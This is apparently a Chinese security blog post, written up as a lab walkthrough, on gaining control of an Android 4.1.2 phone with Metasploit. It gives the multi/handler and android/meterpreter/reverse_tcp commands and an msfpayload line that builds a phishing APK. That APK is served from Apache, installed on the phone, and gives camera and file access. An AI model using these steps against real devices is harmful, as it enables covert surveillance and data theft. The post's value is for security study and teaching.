使用Metasploit获取Android设备权限
实验环境:
- KALI (IN VMWARE)
- Metasploit (IN KALI)
- Android 4.1.2
- Apache2 (IN KALI)
实验步骤:
步骤1. 打开KALI终端,并在终端打开msfconsole:
步骤2. 运行以下命令使用android/meterpreter/reverse_tcp的payload,用于监听程序的连接,使用Metasploit handler:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
步骤3. 运行命令设置lhost和lport,其中lhost我使用了本机的地址,lport我使用了8080作为端口号:
步骤4. 运行exploit开始监听
步骤5. 制作钓鱼APK,使用KALI终端运行以下命令,该命令会在桌面生成一个DropsMsf.apk文件
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.199.207 LPORT=8080 R > /root/Desktop/DropsMsf.apk
步骤6. 运行Apache并搭建简易Web服务器提供apk下载(不是本次实验主要内容简单过)
步骤7. 使用手机下载apk并安装
实验结果
- 可获取Android手机的摄像头权限拍摄照片
- 可下载Android手机的任意文件
- 等等
####实验结果展示
本博客所有内容只用于安全研究,请勿用于恶意攻击。
本文URL: "https://blog.neargle.com/2015/06/28/android-msf-exploit-by-reverse-tcp/index.html"